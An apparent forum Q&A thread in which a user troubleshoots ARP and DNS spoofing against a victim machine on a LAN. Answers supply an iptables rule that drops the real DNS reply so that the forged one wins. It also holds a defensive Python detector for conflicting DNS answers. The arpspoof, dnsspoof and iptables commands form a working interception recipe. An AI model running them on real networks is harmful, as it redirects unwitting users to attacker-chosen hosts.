
My aim is to DNSspoof.

My network is using a wireless router with the address 192.168.1.1 and primary DNS is the same as the router address.

I have enabled kernel IP forwarding in Linux.

My DNS hosts file is spoofhosts.txt:

173.252.74.22  google.co.in

My victim machine is 192.168.1.224

I have done ARP spoofing using

#sudo arpspoof -t 192.168.1.224 192.168.1.1 -i wlan0
#sudo arpspoof -t 192.168.1.1 192.168.1.224 -i wlan0

and I have done DNS spoofing:

ashok@c:~$ sudo dnsspoof -f spoofhosts.txt -i wlan0 host 192.168.1.224 and udp port 53
[sudo] password for ashok: 
dnsspoof: listening on wlan0 [host 192.168.1.224 and udp port 53]
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.15703 > 192.168.1.1.53:  32219+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in
192.168.1.224.14489 > 192.168.1.1.53:  3788+ A? google.co.in

I am getting the above responses, but DNSspoofing is not working for the victim.

However, I have observed in Wireshark on the victim system that the DNS response is coming from the router faster than mine.

[Wireshark screenshot: DNS queries]

See the second line, which gives the response directly from the router with the valid Google IP.

How do I solve this? Is this a problem with the dnsspoof command? What happened?


3 Answers


Finally, I got it!

Dnsspoof can't modify the DNS packet; it can only send another prepared packet with a spoofed address. But the real packet reaches the victim first, and the victim's computer takes only that one into consideration.

The solution to our problem is blocking the real packet. I did this using iptables with the specific address in hex:

# iptables --append FORWARD --match string --algo kmp --hex-string '|e1 e0 68 2d|' --jump DROP

You can find your target website's IP in hex in Wireshark or another sniffer when you connect to the server in the normal way.

I know this isn't the best method but it works :)

  • This worked for me as well. Converting the victim IP to hex by hand or with a calculator is probably a little quicker if you didn't already have Wireshark running, e.g. `192.168.1.17` -> `'|c0 a8 01 10|'` – Cam Saul Oct 05 '17 at 22:43
  • One downside, though, is that this blocks all DNS responses from the gateway to the target machine, so if a name is not in your `dnsspoof` hosts file the victim machine won't be able to resolve it – Cam Saul Oct 05 '17 at 22:51
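As an added example from the detection side (my code, not from the original post or from the dnsspoof tool), here is a small Python script that flags what the asker's Wireshark capture shows: two answers with different A records arriving for the same DNS transaction. It parses raw DNS responses itself and runs on constructed packets; the 203.0.113.x addresses are placeholders, and the source IP is deliberately not part of the grouping key because a forged reply carries the resolver's own address.

```python
import struct
from collections import defaultdict

def build_response(txid, qname, ip):  # builds constructed test data, not a real capture
    labels = b"".join(bytes([len(p)]) + p.encode() for p in qname.split("."))
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # id, flags, qd, an, ns, ar
    question = labels + b"\x00" + struct.pack(">HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 60, 4)  # name = pointer to offset 12
    return header + question + answer + bytes(int(o) for o in ip.split("."))

def read_name(data, off):  # decode a DNS name, following compression pointers
    parts = []
    while True:
        n = data[off]
        if n & 0xC0 == 0xC0:  # pointer: rest of the name lives elsewhere in the packet
            ptr = struct.unpack(">H", data[off:off + 2])[0] & 0x3FFF
            return ".".join(parts + [read_name(data, ptr)[0]]), off + 2
        off += 1
        if n == 0:
            return ".".join(parts), off
        parts.append(data[off:off + n].decode())
        off += n

def parse_response(data):  # -> (txid, qname, [A record IPs]) for a single-question response
    txid, _flags, _qd, an = struct.unpack(">HHHH", data[:8])
    qname, off = read_name(data, 12)
    off, ips = off + 4, []  # skip QTYPE and QCLASS
    for _ in range(an):
        _, off = read_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
        if rtype == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in data[off + 10:off + 14]))
        off += 10 + rdlen
    return txid, qname, ips

def find_conflicts(packets):
    """Return transactions (client, port, txid, qname) that got more than one distinct answer set."""
    seen = defaultdict(list)
    for src, dst, dport, payload in packets:  # source IP is recorded but not keyed on
        txid, qname, ips = parse_response(payload)
        seen[(dst, dport, txid, qname)].append((src, tuple(ips)))
    return {k: v for k, v in seen.items() if len({ips for _, ips in v}) > 1}

# Constructed sample mirroring the question: txid 32219 gets the router's genuine answer
# (203.0.113.10 is a placeholder) and then the hosts-file address; txid 3788 gets only one.
SAMPLE_PACKETS = [
    ("192.168.1.1", "192.168.1.224", 15703, build_response(32219, "google.co.in", "203.0.113.10")),
    ("192.168.1.1", "192.168.1.224", 15703, build_response(32219, "google.co.in", "173.252.74.22")),
    ("192.168.1.1", "192.168.1.224", 14489, build_response(3788, "example.test", "203.0.113.20")),
]
```

A resolver or IDS sensor that keeps the same per-transaction state can raise an alert on the conflicting transaction instead of silently accepting whichever reply arrived first.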

Try flushing DNS cache on all involved clients before attempting DNS spoofing.

On Windows, open a terminal and type: ipconfig /flushdns

On Linux, open a terminal and type: sudo /etc/init.d/nscd restart

On Mac OS X open a terminal and type: sudo dscacheutil -flushcache

    I have the same problem, and flushing the DNS cache on clients didn't work. And I think it is not practical to expect the clients' DNS cache to expire while DNS spoofing. – marson parulian Apr 29 '16 at 12:58

Blocking the DNS reply from the intended DNS server does not work (at least for me). The browser at the victim waits for the original reply and times out if it does not arrive. The browser indicated "server timed out".